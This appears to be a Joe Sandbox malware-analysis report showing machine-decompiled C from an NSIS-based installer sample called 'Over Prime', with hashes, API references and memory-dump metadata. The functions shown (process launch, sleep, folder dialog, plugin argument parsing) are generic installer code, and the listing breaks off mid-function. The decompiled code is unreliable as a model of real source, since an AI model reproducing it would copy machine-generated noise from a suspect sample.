Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7df962e28814a7b3caa402d741087caf5a38db38328101cb4f5459854336c5b1
Instruction ID: fd6328bb44db881eb47d81d7c593bcae39042c42d4021ce5af2a3816b381e723
Opcode Fuzzy Hash: 7df962e28814a7b3caa402d741087caf5a38db38328101cb4f5459854336c5b1
Instruction Fuzzy Hash: B0419FF2D4020CDFFB25AF66DB81B4937B9EB05314F328436E809AF540E63994818B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 29f89c5268de7fdb96a14e39ddc9ecdf9af955805811913ad38c834b3712293d
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: 29f89c5268de7fdb96a14e39ddc9ecdf9af955805811913ad38c834b3712293d
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
Opcode Fuzzy Hash: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040498A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x51100c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x51456a
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c49
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

A, xrefs: 00404AAD
Call, xrefs: 00404AEB, 00404AF0, 00404AFB
C:\Users\user\AppData\Local\Temp, xrefs: 00404ADA
jEQ, xrefs: 00404C49

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call$jEQ
API String ID: 2624150263-1184436815
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 73B91BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73B91BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E73B912BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E73B912BB();
				_t321 = E73B912E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E73B913B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E73B9162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x73b923e8) & 0x000000ff) * 4 +  &M73B9235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E73B912CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E73B912BB();
											 &_v12 = E73B91B86( &_v12);
											__eax = E73B91510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
